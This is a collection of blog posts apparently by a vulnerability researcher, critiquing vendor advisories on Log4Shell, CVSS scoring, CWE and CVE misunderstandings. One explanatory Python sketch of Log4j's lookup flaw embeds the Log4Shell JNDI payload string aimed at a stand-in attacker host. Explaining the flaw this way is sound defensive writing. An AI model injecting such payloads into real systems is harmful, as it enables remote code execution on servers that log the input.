Log4Shell: Redefining Painful Disclosure

Log4Shell is yet another example of why we simply don’t get security right, and it strongly suggests there is little hope for change. Plenty of blogs and articles offer great analysis of the vulnerability from the exploitation and impact angle. Far fewer examine why the bug exists in the first place, and why it took so long to notice. I’ll briefly touch on that and then look at Log4Shell from a bigger-picture perspective, in the context of vendor responses and how they show all the chinks in the armor; enough to demonstrate that we don’t really have a set of armor at all.

If you are familiar with Log4Shell, you may want to skip the next two paragraphs, but part of the abridged summary spells out some CVE assignment confusion and explains how this blog will refer to the various issues.

What is Log4Shell? (Abridged)

On November 30, 2021, a vulnerability was made public in the Apache Log4j library that affected version 2.x but not 1.x. This is largely because, despite the same name, Log4j 2.x represents a complete rewrite of the Log4j 1.x codebase. For ease, I will refer to the library as Log4j in this blog but specifically mean the 2.x version.

The gist of the vulnerability is that when the Log4j library receives user-supplied input, it not only logs the information but can also perform lookup actions on it. This can result in the execution of arbitrary code. Since logging is frequently implemented in a way that receives user-supplied input, this represents a significant issue and can allow trivial compromise of the system. In large enterprises, these logs may be automatically forwarded and consolidated on logging hosts that make administrative work easier, so that simple remote code execution might impact a different system than the one the input was sent to.
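To make the mechanism concrete, here is a minimal Python sketch, not Log4j’s actual code; the handlers and messages are invented for illustration. It models a logger that performs `${...}` lookup expansion on the strings it logs, which is the flaw: lookups are expanded in *data*, not just in configuration patterns.

```python
import re

# Illustrative lookup handlers; real Log4j supports jndi:, env:, sys:, etc.
def resolve_lookup(token: str) -> str:
    scheme, _, value = token.partition(":")
    if scheme == "jndi":
        # In vulnerable Log4j 2.x this is where a real JNDI/LDAP dereference
        # happens -- i.e., attacker-controlled code loading.
        return f"<would dereference {value!r} over the network!>"
    if scheme == "env":
        return f"<value of environment variable {value!r}>"
    return token

LOOKUP = re.compile(r"\$\{([^}]*)\}")

def log(message: str) -> str:
    # The flaw: lookup tokens are expanded inside logged *data*.
    return LOOKUP.sub(lambda m: resolve_lookup(m.group(1)), message)

# A "User-Agent" header an attacker controls ends up in the log call:
print(log("GET / UA=${jndi:ldap://attacker.example/a}"))
```

The moment user-controlled data reaches such a logger, the attacker controls what gets looked up; in vulnerable Log4j 2.x versions the `jndi:` branch can load and execute attacker-supplied classes.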

The vulnerability was originally assigned CVE-2021-44228, but the initial fix was found to be incomplete. This led to a second CVE assignment, CVE-2021-45046, which immediately started being confused with a separate issue affecting Log4j 1.x only, and only if the attacker had privileged access to begin with (CVE-2021-4104). Red Hat assigned CVE-2021-4125 to represent the original vulnerability as applied to their specific products, which is a violation of CVE Numbering Authority (CNA) rules. To add more confusion, the second attempt to fix the original vulnerability led to the discovery of a distinct denial-of-service vulnerability, assigned CVE-2021-45105. Finally, yet another flaw was discovered, but it too required privileged local access, despite being called “remote” by many, and it was assigned CVE-2021-44832.

This blog will generally refer to the original vulnerability (2021-44228), unless stated otherwise, by its nickname “Log4Shell”. Note that while the vulnerability was technically made public on November 30 and the vendor patched it on December 6, it was not widely covered until December 10th.

Log4j History (Abridged)

First, let’s look at a slightly different history of high-risk log4j vulnerabilities, including this one. This will become important in subsequent sections. Note that the severity scores represented are CVSSv2. 

There are three more Log4j vulnerabilities, all without a CVE ID, each scored below 6.9 CVSSv2. On top of CVSS scores, it is also important to note that the current Log4j vulnerability (2021-44228) has been scored CVSSv2 10.0 / CVSSv3 10.0 by NVD. These scores, along with many others, are not correct, as they fall into several traps that all stem from not following the CVSS specifications. As VulnDB notes, based on RBS Chief Research Officer Carsten Eiram’s analysis:

The CVSS score for this entry has been updated to reflect adherence to the CVSS scoring guidelines. On the surface this appears to be a CVSSv2 10.0 / CVSSv3 10.0 issue, as reflected in NVD and briefly by RBS. In some scenarios this is an accurate score, in others it is not. However, scoring must be done based on Log4j and the context it runs in, not speculation on possible use-case scenarios. The base score reflects that, and CVSS environmental scores allow an organization to re-cast the score based on their specific environment. So if e.g. a web server is passing user-controlled content to the logs which are then forwarded to a logging host, that represents a scope change and would get scored MS:C. Since Log4j is a library, it would have to be configured / implemented in such a way as to allow user-controlled strings which warrants Access Complexity Medium (AC:M) for CVSSv2, leading to a 9.3 score. In this case, AC:M is used for just that and does not represent user interaction required, which is often what AC:M designates. As always for libraries, they can only be scored for that *one* product, the library itself. All the products bundling the library will be affected in a myriad of ways that result in different scores, and organizations will have to tweak those scores depending on their individual configurations. A re-based score may be derived for different business units or applications even, depending on the organization’s security workflow.

Carsten Eiram, Chief Research Officer, Risk Based Security

This same scoring issue can be seen with NVD and CVE-2019-17571 (v2 7.5 / v3 9.8), as well as NVD’s score for CVE-2017-5645 (v2 7.5 / v3 9.8). The discrepancy between the v2 and v3 scores immediately stands out, since the v2 score assumes the library runs with lower privileges (C:P/I:P/A:P) while the v3 score reflects that it may run with higher privileges (C:C/I:C/A:C). NVD’s 10.0 / 10.0 score for the Log4j issue does not follow the specifications, and the v3 score (with scope changed) is scored with specific scenarios in mind that are not the default.
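The 9.3 figure from the quoted analysis can be reproduced from the CVSSv2 base equation in the FIRST specification. A small Python sketch (metric weights taken from that spec) shows how the single change from AC:L to AC:M, reflecting that the library must be configured to log user-controlled strings, moves the score:

```python
# CVSSv2 base metric weights, per the FIRST CVSS v2 specification.
AV = {"L": 0.395, "A": 0.646, "N": 1.0}
AC = {"H": 0.35, "M": 0.61, "L": 0.71}
AU = {"M": 0.45, "S": 0.56, "N": 0.704}
CIA = {"N": 0.0, "P": 0.275, "C": 0.66}

def cvss2_base(av, ac, au, c, i, a):
    impact = 10.41 * (1 - (1 - CIA[c]) * (1 - CIA[i]) * (1 - CIA[a]))
    exploitability = 20 * AV[av] * AC[ac] * AU[au]
    f = 0.0 if impact == 0 else 1.176
    return round(((0.6 * impact) + (0.4 * exploitability) - 1.5) * f, 1)

# NVD-style score, assuming user-controlled strings reach the logger by default:
print(cvss2_base("N", "L", "N", "C", "C", "C"))  # 10.0
# Score acknowledging the configuration requirement (AC:M):
print(cvss2_base("N", "M", "N", "C", "C", "C"))  # 9.3
```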

Regardless of these scores, 2021-44228, 2019-17571, and 2017-5645 should all be treated as equally serious until an organization determines how each impacts them. In reality? That isn’t the case, and it doesn’t make sense, other than the fact that news outlets, researchers, and vendors all cried out that this one is “critical” while the previous vulnerabilities were largely ignored. This is very similar to the Struts-Shock vulnerability, which made the news primarily because it was used to breach Equifax, while other Apache Struts vulnerabilities didn’t enjoy any attention. Perhaps if the other 21 remote code execution vulnerabilities in Struts had names they too would be better known?

Vendor Disclosure Disappointment

This Log4j vulnerability stands apart from prior issues in the library, even ones with the same severity. We see vendors publish advisories calling it a “global event” and “industry-wide“, using language that seems to convey that being vulnerable “couldn’t be helped, it affects everyone!” Sure? While that may be true, it raises the question of why they published an advisory for Log4Shell but not for prior vulnerabilities. In other cases, a vendor may definitively (and ironically) say that it “affects all service providers using the Log4J Java library“, which is untrue, while also saying it “affects certain applications and services” of theirs. This is in addition to a staggering number of vendors publishing advisories saying they are not impacted by the vulnerability, something we have never seen at this volume. Of course, I have to mention the vendors that are “quickly working to assess any potential impact to our clients and the company” … three weeks later.

[1/8/2022 Next two paragraphs updated, thanks to L.P. for the pointer on origin of “LogJam” confusion.]

Despite not being the researchers to discover this vulnerability, LunaSec was one of the first to write an easy-to-digest blog explaining the issue. This is valuable to many administrators that need to quickly understand the risk. However, LunaSec decided to name the vulnerability despite not finding it. They chose “logjam” for the name, oblivious to the fact that Logjam was the name given to the “Diffie–Hellman Key Exchange DHE_EXPORT Cipher Handling Downgrade MitM Weakness” vulnerability back in 2015. That vulnerability didn’t fly under the radar by any means; consider that VulnDB has over 1,000 references for it, meaning many hundreds of vendors wrote advisories and patched it in their software. LunaSec apparently had no knowledge of this vulnerability and didn’t do a simple search for the name before using it. This is amateur hour, extremely counter-productive, and introduces serious confusion around the vulnerability.

Vendors that don’t publish advisories frequently are also more prone to simple mistakes that introduce confusion. Take Pandora FMS or Kiteworks for example, who conflated Log4Shell with Logjam, no doubt because they saw LunaSec call it that. The two issues are extremely different: one is in Apache’s Log4j library, the other is in the Diffie–Hellman Key Exchange and requires a privileged network position to intercept traffic. But this mistake isn’t just the domain of those new to security advisories; Micro Focus, which has decades of experience sharing vulnerability information (typically in changelogs instead of formal advisories), made the same mistake. You might chalk this up to a simple error, but remember that Micro Focus wrote at least five advisories referencing LogJam. [1] [2] [3] [4] [5]

For those using CVE IDs to track this vulnerability it can get confusing. Log4Shell has three associated CVE IDs: the original (2021-44228), the incomplete fix (2021-45046), and a duplicate assignment from a CNA (2021-4125). Then we have waves of incorrect CVE IDs being used, typically transposed number typos. This may cause someone to think there is yet another Log4J vulnerability though, or cause them to miss an advisory as they are searching for the correct CVEs. We can see some examples from researchers (2021-4438), bloggers and universities (2021-44248), companies (2021-44248), security news (2021-44882), vendors (2021-45056), security companies (2021-44226) and likely more variations. There are more incorrect CVE IDs attributed to this vulnerability than correct ones.
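One way to catch these typos, sketched here with hypothetical tooling (the function names are mine, not from any real library), is to compare a cited ID against the known Log4Shell IDs using Damerau-Levenshtein distance, which counts a single substituted digit or an adjacent-digit swap as one edit:

```python
def dl_distance(a: str, b: str) -> int:
    """Damerau-Levenshtein distance (adjacent transpositions count as 1)."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,        # deletion
                          d[i][j - 1] + 1,        # insertion
                          d[i - 1][j - 1] + cost) # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]

# The three IDs actually associated with Log4Shell, per the text above.
KNOWN = {"CVE-2021-44228", "CVE-2021-45046", "CVE-2021-4125"}

def likely_typo(cve: str):
    """Return the known ID this string is probably a typo of, if any."""
    if cve in KNOWN:
        return None
    for known in KNOWN:
        if dl_distance(cve, known) <= 1:
            return known
    return None

print(likely_typo("CVE-2021-44248"))  # CVE-2021-44228
```

A threshold of one edit flags several of the variants above while leaving genuinely different IDs alone; anything further away needs a human eye.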

In many cases, this is the first time we have seen an advisory from hundreds of these companies, despite them “caring deeply” and “taking your security seriously“. Yes, they responded quickly to this vulnerability, but why not to the rest? Why are there no advisories for the vulnerabilities specific to your own code? Why no advisories about other third-party library vulnerabilities? It only proves they didn’t act on the prior vulnerabilities because there simply wasn’t the same level of public attention. They don’t care enough to let you know about the risk of dozens or hundreds of other vulnerabilities, but somehow they “deeply care“.

Dozens of vendors are publishing advisories that are only available to paying customers. When a vendor publishes behind a paywall, it makes it difficult for many teams to access that information. While Alice and Bob from the security team may have access, Christine, Dave, Eve, and Frank may not. In other cases the IT/networking team may have access to the account in order to download new firmware, but the security team does not. Those restricted advisories also stay out of reach of third parties that aggregate the information, many of which are retained to provide vulnerability intelligence to the mutual customer. Those customers don’t want to check hundreds of vendors for security updates every day; they pay someone else to.

This also applies to vendors that say they will contact customers directly who require updates or publish an anemic advisory saying you need to contact customer service or “contact our support department for product-specific questions“. In many cases those notifications are not going to the appropriate people. Some accounts are set up by different divisions or managers that handle vendor accounts. In other cases there is employee turnover so that vendors are contacting people who left the company.

There are vendors that may understand the issue and respond accordingly, but then fail to communicate it well to customers. For example, L-Soft’s advisory says that one version of their software uses Log4j 2.15.0 “and is therefore not vulnerable to CVE-2021-44228 (Log4Shell) but may still be vulnerable to CVE-2021-45046 and CVE-2021-45105“. This is incorrect, as 2.15.0 is still vulnerable to Log4Shell in many configurations. If it doesn’t affect them due to their configuration, then the advisory should specifically say so.

How and where vendors choose to disclose can also prove problematic. Modern large organizations may use products and services from thousands of vendors, so it is easy to understand why they don’t want to monitor them all for security updates. In addition to vendor security advisories, knowledge bases, wikis, support forums, and email distributions, some vendors opt to disclose elsewhere. In the case of Log4Shell, we’re seeing that happen on Twitter and Reddit.

In other cases we are seeing “advisories” being shared on GitHub in an image (PNG), which doesn’t let you cut & paste the text. When the article isn’t in your native language, it’s basically worthless since you can’t trivially translate it. It reminds me of vendors that publish changelogs or advisories in PDF format, but have disabled the copy & paste functionality in it. 

The researcher SwitHack has done an incredible job collecting vendor advisories related to Log4Shell, but in doing so, has created a similar situation where disclosures happen in comments to their Gist. This collection of references also highlights the problem of “linkrot”: when a link goes 404 because the content has moved or been removed completely. It’s been less than one month and half a dozen references are already 404. Some vendors publish their advisory in a place that almost guarantees it will move or vanish in time.

Tracking vulnerabilities by the version of affected software is typically the best approach, but in some cases vendors work against your efforts, such as when they say “The following product IS affected: AppDev Pack versions 1.0.5 – 1.0.11” and then “As of this writing the latest release of AppDev Pack, version 1.0.11, updates the referenced version of log4j2 to 2.15.0.” In this case, not only do you have to download the same version of the software as of a given date, you are still not protected weeks later, because it only updates Log4j to 2.15.0 instead of 2.17.0, which resolves all of the known issues.
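Once you know the fixed-in versions from Apache’s advisory (2.15.0, 2.16.0, and 2.17.0 for CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105 respectively, on the Java 8 release line), a version-based check is easy to automate. A sketch, with that mapping hard-coded as an assumption:

```python
# Fixed-in versions for the Log4j 2.x (Java 8) line, per Apache's advisory.
FIXED_IN = {
    "CVE-2021-44228": (2, 15, 0),
    "CVE-2021-45046": (2, 16, 0),
    "CVE-2021-45105": (2, 17, 0),
}

def parse(version: str) -> tuple:
    """Turn '2.15.0' into a comparable tuple (2, 15, 0)."""
    return tuple(int(part) for part in version.split("."))

def unresolved(bundled_version: str):
    """Which of the known CVEs does this bundled Log4j version leave open?"""
    v = parse(bundled_version)
    return sorted(cve for cve, fixed in FIXED_IN.items() if v < fixed)

# The vendor above shipped 2.15.0 -- patched against the original CVE only:
print(unresolved("2.15.0"))  # ['CVE-2021-45046', 'CVE-2021-45105']
print(unresolved("2.17.0"))  # []
```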

There is another type of vendor that likes conveying information in tables. For some data that is great, but for vulnerability information it can often be more difficult to process. Solace decided to share their matrices as images that are basically unreadable as-is. You have to copy the image URL and load it in a new tab to read them, since they aren’t even clickable links. HCL Technologies gives us one table to decipher, a word I use with reason. This handy table will let you figure out if you are impacted:

When it comes to clarity in vulnerability disclosure it can be tricky in a case like Log4Shell, given it has three CVE IDs and additional vulnerabilities were discovered within days of the original disclosure. However, when a vendor references three CVE IDs for Log4J vulnerabilities and then decides to also include a 2018 vulnerability in Log4Net, which is not affected by the Log4Shell issue, it can introduce confusion. Specific to Log4J, some of the initial confusion came in the form of version 1.x versus 2.x. While they share the same name, Log4J, version 2.x was a complete rewrite of 1.x and doesn’t share much beyond the name. Given that several vulnerabilities do not affect 1.x while one vulnerability affects 1.x and not 2.x, it’s messy. So a vendor responding to the Log4Shell vulnerability (in 2.x) proudly saying something like “We’re not vulnerable, we use 1.x!” and then not mentioning if they are impacted by CVE-2021-4104 (in 1.x) is frustrating.

If all of this seems discouraging, and you now better appreciate some of the frustrations around vulnerability intelligence, consider this: not even the vendor, Apache, gets it right. Three weeks after Log4Shell was disclosed, the Apache blog aggregating information about their own products is missing information (Daffodil, HBase, ManifoldCF, etc.) and incorrect about some (Geode, Jena, etc.). If the vendor can’t aggregate accurate and timely information on their own product portfolio, what hope do the rest of us have?

Keeping Up

As you can see from the ‘Disclosure Disappointments’ above, trying to stay current with the Log4Shell vulnerability is a nightmare. VulnDB is currently cataloging over 1,100 vendor advisories in addition to vendor specific solution references, exploits, and a wide variety of additional references. In less than 30 days, VulnDB 275958 (Log4Shell) has more references than Spectre, Meltdown, SWEET32, SLOTH, FREAK, Shellshock, Heartbleed, and Logjam. The only vulnerability with more references right now is POODLE, but that is likely to change in the coming weeks as more vendors finally publish their advisories.

Every day the VulnDB team continues to scour vendor web sites, Twitter, GitHub, and other sources looking for more information. When a new advisory is found we have to determine if any information needs to be cataloged and update the entry accordingly. Consider adding one reference or one vendor/product/version combination or updating one field as a single data point, and imagine what that looks like. As of this blog, that is 9,749 points of data which is staggering for one vulnerability, especially for one published less than a month ago. Here’s what that looks like:

You can see when the news sank in and vendors really started responding to it. For the next half year or more, that entry will keep getting updated. For those who think that managing a vulnerability database is “just collecting public information“, you are right. But summiting Mount Everest is also just “walking up that hill“.

What can you do? The customers have the power here. If your vendor releases a poorly worded advisory, or this is their very first advisory, take them to task. You must hold them accountable and be ready to switch vendors, which is painful I know, so that your money can teach them a lesson. Demand not only better security practices from your vendors, but better communication about vulnerabilities that impact you. Unfortunately, that threat of switching vendors is typically an empty one, and vendors know it.

Based on everything above, enumerating many of the failures around disclosing a single vulnerability, it’s hard to imagine our industry has much hope. How can organizations really expect to maintain security in the face of vendors that say they care, but act otherwise? Vendors and the information security sector are expected to provide a level of defense that will repel attackers. Unfortunately, we’re our own worst enemy and the staggering number of data breaches are evidence of that. But hey, at least we put on a good show.

A critique of the summary of “Latent Feature Vulnerability Rankings of CVSS Vectors”

Update: Corren McCoy has written a wonderful response to this blog where she goes into more detail about her conclusions as well as citing more portions of the original research that led to her conclusions. As she notes, there are several layers of condensing the original research at play here, which can dilute and distort the original research. In her follow-up she breaks down each of these areas that I address below. If you continue reading my blog below, please read her reply after to get a better picture. Thank you!

“What do you think of this?” It always starts out simple. A friend asked this question about an article titled Summary of “Latent Feature Vulnerability Rankings of CVSS Vectors”. The study is math-heavy and that is not my jam. But vulnerability databases are, and that includes the CVE ecosystem, which encompasses NVD. I am also pretty familiar with the limitations of the CVSS scoring system, and colleagues at RBS have written extensively on them.

I really don’t have the time or desire to dig into this too heavily, but my response to the friend was “immediately problematic“. I’ll summarize some of the things that stand out to me, starting with the first graphic included, which she specifically asked me about.

  • The header graphic displays the metrics for the CVSSv3 scoring system, but is just labeled “CVSS”. Not only is this sloppy, it obscures an important point of this summary: the paper’s work is based on CVSSv2 scores, not CVSSv3. They even qualify that just below: “We should note the analysis conducted by Ross et al. is based upon the CVSS Version 2 scoring system…”
  • “Ross et al. note that many exploits exist without associated CVE-IDs. For example, only 9% of the Symantec data is associated with a CVE-ID. The authors offered additional caveats related to their probability calculation.” That sounds odd, but it is readily explained above when they summarize what that data is: “Symantec’s Threat Database (SYM): A database extracted from Symantec by Allodi and Massacci that contains references to over 1000 vulnerabilities.” First, that data set contains a lot more than vulnerabilities. Second, if Symantec is really sitting on over 900 vulnerabilities that don’t have a CVE ID, then as a CNA they should either assign them an ID or work with MITRE to get an ID assigned. Isn’t that the purpose of CVE?
  • “Ross et al. use four datasets reporting data on vulnerabilities and CVSS scores…” and then we see one dataset is “Exploit Database (Exploit-DB): A robust database containing a large collection of vulnerabilities and their corresponding public exploit(s).” Sorry, but EDB doesn’t assign CVSS scores, so the only ones present would be those given by the people disclosing the vulnerabilities via EDB, some of whom are notoriously unreliable. While EDB is valuable in the disclosure landscape, serving as a dataset of CVSS scores is not one of its strengths.
  • “About 2.7% of the CVE entries in the dataset have an associated exploit, regardless of the CVSS V2 score.” This single sentence is either very poorly written, or it is all the evidence you need that the authors of the paper simply don’t understand vulnerabilities and disclosures. With a simple search of VulnDB, I can tell you at least 55,280 vulnerabilities have a CVE and a public exploit. There were 147,490 live CVE IDs as of last night, meaning almost 38% have a public exploit. Not sure how they arrived at 2.7%, but that number should have been immediately suspect.
  • “In other words, less than half of the available CVSS V2 vector space had been explored despite thousands of entries…” Well sure, but this statement doesn’t acknowledge one major reason for that. Enumerate all the possible CVSSv2 metric combinations and derive their scores, then look at which numbers don’t show up on that list. A score of 0.1 through 0.7 is not possible, for example. Then weed out the combinations that are extremely unlikely to appear in the wild, which is most of those with “Au:M” for example, and it weeds out a lot of possible values.
  • “Only 17 unique CVSS vectors described 80% of the NVD.” Congrats on figuring out a serious flaw in CVSSv2! Based on the 2.7% figure above, I would immediately question the 80% here too. That said, there is a serious weighting of scores primarily in web application vulnerabilities, where e.g. an XSS, SQLi, RFI, LFI, and limited code execution could all overlap heavily.
  • “Input: Vulnerabilities (e.g., NVD), exploit existence, (e.g., Exploit-DB), the number of clusters k” This is yet another point where they introduce a dataset they don’t understand and make serious assumptions about. Just because something is posted to EDB does not mean it is a public exploit. Another quick search of VulnDB tells us there are at least 733 EDB entries that are actually not a vulnerability. This goes back to the reliability of the people submitting content to the site.
  • “The authors note their approach outperforms CVSS scoring when compared to Exploit-DB.” What does this even mean? Exploit-DB does not do CVSS scoring! How can you compare their approach to a site that doesn’t do it in the first place?
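The limited-vector-space point is easy to verify directly: enumerate all 3^6 = 729 CVSSv2 base metric combinations, score each with the base equation from the FIRST spec, and inspect the distinct results. Among other things, the lowest achievable non-zero score is 0.8, so 0.1 through 0.7 can never appear:

```python
from itertools import product

# CVSSv2 base metric weights, per the FIRST CVSS v2 specification.
AV = {"L": 0.395, "A": 0.646, "N": 1.0}
AC = {"H": 0.35, "M": 0.61, "L": 0.71}
AU = {"M": 0.45, "S": 0.56, "N": 0.704}
CIA = {"N": 0.0, "P": 0.275, "C": 0.66}

def base(av, ac, au, c, i, a):
    impact = 10.41 * (1 - (1 - CIA[c]) * (1 - CIA[i]) * (1 - CIA[a]))
    exploitability = 20 * AV[av] * AC[ac] * AU[au]
    f = 0.0 if impact == 0 else 1.176
    return round(((0.6 * impact) + (0.4 * exploitability) - 1.5) * f, 1)

# Every reachable base score across all 729 metric combinations.
scores = {base(*combo) for combo in product(AV, AC, AU, CIA, CIA, CIA)}

print(min(s for s in scores if s > 0))  # 0.8 -- nothing between 0.1 and 0.7
```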

Perhaps the summary is not well written and the paper actually has more merit? I doubt it; the summary seems comprehensive and captures the key points, but I don’t think the summary’s author works with this content either. Stats and math, yes. Vulnerabilities, no.

More authorities, more CVEs; Oh, and more commentary.

On November 10, TechBeacon published a great article by Rob Lemos titled “More authorities, more CVEs: What it means for app sec teams” in which I was quoted, along with several other people.

Like many articles of this nature, those who provide input often talk for as long as half an hour and ultimately get a couple of lines quoted. We do it to provide background and context on the topic, as well as to have an open discussion on vulnerability trends. That means there are ‘outtake’ opinions and facts, as well as potential reactions to parts of the article that did not include our input. So this blog covers some of my random observations to complement the article.

Until 2016, more than 80% of software security issues assigned a CVE identifier belonged to only 10 classes, or weaknesses, as classified by their Common Weakness Enumeration (CWE) category. But in 2019, the top 10 weaknesses only accounted for 59% of reported vulnerabilities.

The Common Weakness Enumeration (CWE) index is interesting to me, and I wonder if it has gotten so big that it degrades its own value. Consider that there are now 891 CWE identifiers as of the August 20 release of version 4.2 of the framework. Per the article, only 10 of them account for 59% of vulnerabilities, which will no doubt include XSS, SQLi, and CSRF. That makes me question the value of abstracting so much, as it means hundreds of those CWEs represent a handful of vulnerabilities at most.

Digging into the 2,298-page PDF documenting version 4.2, you can jump toward the end of the CWE list and see that several have been created but have no “Observed Examples”. In fact, searching for that phrase only yields 397 hits. Does that mean that out of 891 CWE IDs representing weaknesses, MITRE has only come up with 397 that match known vulnerabilities? I certainly expect otherwise and hope this is just a documentation shortcoming, as I feel that every CWE ID should be linked to a concrete real-world example.

I’d love to see a simple breakdown of the top 100 CWE along with how many vulnerabilities are associated with them (via NVD, since MITRE doesn’t actually apply CWE to entries) and what percentage of the overall vulnerabilities that represents. It might be very telling just how useful CWE is and if the project is being pushed too heavily from an academic standpoint. Before you judge that comment, let me know how useful this CWE report from MITRE is, and make sure you load it in Chrome.
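That breakdown is straightforward to compute once you have CVE-to-CWE assignments, e.g. extracted from the NVD JSON feeds. A sketch with made-up sample data, since the feed parsing itself is beside the point:

```python
from collections import Counter

# Hypothetical (CVE ID, CWE ID) pairs, standing in for parsed NVD data.
assignments = [
    ("CVE-A", "CWE-79"), ("CVE-B", "CWE-79"), ("CVE-C", "CWE-89"),
    ("CVE-D", "CWE-79"), ("CVE-E", "CWE-352"), ("CVE-F", "CWE-22"),
    ("CVE-G", "CWE-79"), ("CVE-H", "CWE-89"), ("CVE-I", "CWE-787"),
    ("CVE-J", "CWE-79"),
]

counts = Counter(cwe for _, cwe in assignments)
total = len(assignments)

# Top-N CWEs and the share of all vulnerabilities they account for.
top = counts.most_common(3)
share = sum(n for _, n in top) / total
for cwe, n in top:
    print(f"{cwe}: {n} ({n / total:.0%})")
print(f"top 3 cover {share:.0%} of entries")
```

Run over the real feeds, the same dozen lines would show exactly how much of NVD the top 10 or top 100 CWEs cover, and how many of the 891 identifiers are effectively never used.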

It’s an open question whether the addition of coding repositories will lead to another expansion in the number of vulnerabilities.

I don’t think that is an open question at all. I think the number of vulnerabilities will go up as a result of more coding repositories becoming a CNA. But that isn’t really the issue here. Instead, the real questions should be centered around what quality of CVE entries they will provide, if they will adhere to CNA standards, and if MITRE will enforce CNA policy on them.

Based on history, the short answers to those questions are: quality will go down, no, and no. Until MITRE provides a breakdown of how many IDs were published by each CNA, it is difficult to know for sure. Speaking of which, why hasn’t MITRE published such statistics? Rhetorical question, apologies.

Open source vulnerabilities: Do you know what’s in your software?

I, along with many others, can’t stress this enough! Please make sure you understand what third-party software your developers are using. This affects your organization from both a vulnerability standpoint and a legal accountability standpoint. Using a third-party library against its license could open you up to some hardships.

The only reason I quoted this section is because I just read an article in the latest Wired that mentions Bootstrap is thought to be used on nearly 20% of all web sites across the Internet. That is incredible.

Patch Tuesday is becoming a bottleneck

There is a lot more that can be said on this topic. It reminds me of a 2015 blog I wrote that actually goes back farther to 2007 where this problem was predicted long before the nightmare IT teams experience once a month. It’s only going to get worse as more vendors jump on this patch schedule and the only ones who will suffer are their paying customers. But hey, let’s let them keep using the term “responsible” disclosure too.

But exploitability alone doesn’t solve the problem—three quarters of the 17,300 vulnerabilities identified ranked CVSS exploitability rating of 8.0 or higher.

I’m not sure a more perfect example exists of why CVSS has become worthless. On its own, especially using the Base score only, is it really helpful that so many vulnerabilities are ‘High Risk‘? This is also a good reminder of another blog I have been meaning to write for a while that outlines the distribution of CVSSv2 versus CVSSv3 scores and how it impacts scoring. With a couple of charts you will get a nice visual of just how poorly thought out some of the framework was. Of course, this has already been evaluated by others years back as well.

Finally, because I don’t hold the copyright to the picture used in the TechBeacon article header, I offer my version:

Picture of me by D2d in November, 2018 at Tomayo, in Denver, CO.

Why @anacondainc Doesn’t Fully Understand CVEs

It’s worrisome that in 2020 we still have people in influential technical roles who don’t understand CVE. A friend told me earlier this year he was in a meeting where someone said that CVE IDs are assigned in order, so CVE-2020-9500 meant there had been 9,500 vulnerabilities in 2020 so far. Of course, that is not how it works, and it reflects a dangerous misunderstanding of CVE.

I ran across an article written by Nick Malkiewicz of Anaconda titled “Why Understanding CVEs Is Critical for Data Scientists“. This article has several bits that show a lack of understanding of what CVE is. One of the biggest is equating a CVE with a vulnerability. Yes, many vulnerabilities map directly to a single CVE identifier, but the CVE is the identifier, not the vulnerability. Additionally, sometimes one vulnerability can track with multiple CVE IDs, or one CVE ID can track to multiple vulnerabilities. So lines like the following are concerning:

When someone finds a CVE, they report it to a CVE Numbering Authority (CNA).

When someone finds a vulnerability, they report it to MITRE or to a vendor, which may be a CNA but more often is not. That vendor can then ask MITRE for an ID via a web form.

CNAs assign identification numbers to CVEs and list them in publicly accessible databases.

A CNA is required to inform MITRE after a CVE-assigned vulnerability has been disclosed. That is actually a fairly recent rule, implemented in the last few years. For most of CVE’s history there was no requirement or specific communication channel for a CNA to notify MITRE of this. That was one of many failings of the CVE ecosystem and directly led to companies being breached, as they relied on CVE to be ‘complete’ and timely.

Each vulnerability listed in a CVE database has a score from .1 to 10, 10 being the highest risk level. These scores are based on exploitability, impact, remediation level, report confidence, and other qualities.

Technically, not even the first line is true, as NVD can score a vulnerability 0.0, meaning it is not a vulnerability and poses no risk. This occurs when a researcher or vendor discloses a vulnerability but doesn’t fully understand the issue or the subsequent impact. It happens hundreds of times a year, although many such cases are not included in NVD. The second sentence from Anaconda is also incorrect, as NVD only scores CVSS Base metrics. Exploitability (in the Temporal sense), remediation level, and report confidence are part of Temporal scores and are not included. You can see an example with CVE-2020-2800, published by Oracle and given a CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N score by both Oracle and NVD. This misunderstanding of NVD CVSS scoring is all the more baffling as Anaconda links to the same FIRST CVSS document I do in this paragraph.
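For reference, the Oracle vector above contains only Base metrics, and the CVSSv3.1 base equation alone, sketched here for the Scope:Unchanged case only, with weights and the Roundup function from the FIRST specification, yields the published score; no Temporal metrics are involved:

```python
# CVSSv3.1 base metric weights (Scope:Unchanged), per the FIRST spec.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR = {"N": 0.85, "L": 0.62, "H": 0.27}
UI = {"N": 0.85, "R": 0.62}
CIA = {"N": 0.0, "L": 0.22, "H": 0.56}

def roundup(x: float) -> float:
    # CVSS v3.1 Appendix A "Roundup" -- avoids floating-point surprises.
    n = int(round(x * 100000))
    return n / 100000.0 if n % 10000 == 0 else (n // 10000 + 1) / 10.0

def base_score(vector: str) -> float:
    m = dict(part.split(":") for part in vector.split("/")[1:])
    assert m["S"] == "U", "sketch handles Scope:Unchanged only"
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    impact = 6.42 * iss
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * PR[m["PR"]] * UI[m["UI"]]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))

print(base_score("CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"))  # 4.8
```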

Anaconda goes on to talk about other factors at play, including looking at the history of a package, how fast vendors respond, and more. This is great advice and critical for companies facing tens of thousands of vulnerabilities a year. Unfortunately, they slide into the “more lipstick on that pig” problem:

The good news is, there are tools that automate the CVE monitoring process.

